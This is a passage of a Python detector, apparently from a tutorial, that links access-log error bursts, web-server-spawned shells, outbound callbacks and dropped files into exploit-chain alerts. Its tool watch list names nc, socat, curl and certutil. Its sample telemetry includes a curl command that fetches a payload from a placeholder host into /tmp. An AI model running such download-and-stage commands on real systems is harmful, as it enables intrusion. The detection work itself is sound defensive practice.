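SPAWNED_TOOLS = {"sh", "bash", "dash", "cmd", "powershell", "pwsh", "curl", "wget", "certutil", "socat", "nc", "perl"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/www/", "\\windows\\temp\\", "\\inetpub\\wwwroot\\", "\\appdata\\local\\temp\\")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
METADATA_IPS = {"169.254.169.254"}   # cloud/container instance metadata service
ERROR_BURST = 5                      # 4xx/5xx responses from one source inside WINDOW
WINDOW = timedelta(minutes=10)

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3})')


def parse_access_log(lines):
    """Yield (timestamp, source_ip, status) from combined-format access log lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S"), m["src"], int(m["status"])


def error_burst_sources(lines):
    """Stage 1: sources with ERROR_BURST or more 4xx/5xx responses inside WINDOW."""
    errors = {}
    for ts, src, status in parse_access_log(lines):
        if status >= 400:
            errors.setdefault(src, []).append(ts)
    return sorted(src for src, tss in errors.items()
                  if len(tss) >= ERROR_BURST and max(tss) - min(tss) <= WINDOW)


def is_suspicious_destination(ip):
    return ip in METADATA_IPS or not any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)


def process_tree(root_pid, procs):
    """Return the pid set of root_pid and all its descendants."""
    family, grown = {root_pid}, True
    while grown:
        grown = False
        for p in procs:
            if p.ppid in family and p.pid not in family:
                family.add(p.pid)
                grown = True
    return family


def detect_web_exploit_chain(host, access_lines, procs, nets, files):
    procs = [p for p in procs if p.host == host]
    by_pid = {p.pid: p for p in procs}
    burst = error_burst_sources(access_lines)
    alerts = []
    for child in procs:
        parent = by_pid.get(child.ppid)
        if child.image.lower() not in SPAWNED_TOOLS or not parent or parent.image.lower() not in WEB_SERVERS:
            continue  # stage 2 requires a web-server -> shell/LOLBin spawn
        tree = process_tree(child.pid, procs)

        def within(ev):
            return ev.host == host and ev.pid in tree and timedelta(0) <= ev.ts - child.ts <= WINDOW

        callbacks = sorted({f"{n.dst_ip}:{n.dst_port}" for n in nets if within(n) and is_suspicious_destination(n.dst_ip)})
        drops = sorted({f.path for f in files if within(f) and any(d in f.path.lower() for d in STAGING_DIRS)})
        techniques = ["T1190"] + (["T1105"] if callbacks and drops else [])  # download then file on disk
        alerts.append({"host": host, "parent": parent.image, "child": child.cmdline,
                       "error_burst_sources": burst, "callbacks": callbacks,
                       "dropped_files": drops, "techniques": techniques})
    return alerts


# Constructed sample telemetry for host web-01 (TEST-NET addresses, documentation only).
T0 = datetime(2025, 1, 15, 3, 10)
SAMPLE_ACCESS_LOG = [
    f'198.51.100.23 - - [15/Jan/2025:03:10:{s:02d} +0000] "POST /api/upload HTTP/1.1" {code} 312 "-" "python-requests/2.31"'
    for s, code in ((1, 500), (4, 500), (9, 400), (15, 500), (22, 500), (30, 200))
] + ['10.0.4.8 - - [15/Jan/2025:03:11:00 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"']
SAMPLE_PROCS = [
    ProcEvent(T0 - timedelta(days=3), "web-01", 1200, 1, "apache2", "/usr/sbin/apache2 -k start"),
    ProcEvent(T0 + timedelta(seconds=23), "web-01", 1300, 1200, "sh", 'sh -c "curl -fsSL http://203.0.113.5/update.bin -o /tmp/.cache"'),
    ProcEvent(T0 + timedelta(seconds=24), "web-01", 1301, 1300, "curl", "curl -fsSL http://203.0.113.5/update.bin -o /tmp/.cache"),
    ProcEvent(T0 + timedelta(hours=2), "web-01", 1400, 1200, "apache2", "/usr/sbin/apache2 -k start"),
]
SAMPLE_NETS = [NetEvent(T0 + timedelta(seconds=25), "web-01", 1301, "203.0.113.5", 80)]
SAMPLE_FILES = [FileEvent(T0 + timedelta(seconds=26), "web-01", 1301, "/tmp/.cache")]

if __name__ == "__main__":
    for alert in detect_web_exploit_chain("web-01", SAMPLE_ACCESS_LOG, SAMPLE_PROCS, SAMPLE_NETS, SAMPLE_FILES):
        print(alert)
```

The join key is the process tree rooted at the spawned shell, not the shell's own pid, because the download and the file write usually happen in a grandchild (sh → curl here); an ordinary worker fork (apache2 → apache2) never enters the loop. Private-range destinations are excluded explicitly rather than via ipaddress.is_private, since that property also covers the TEST-NET documentation ranges used in the sample.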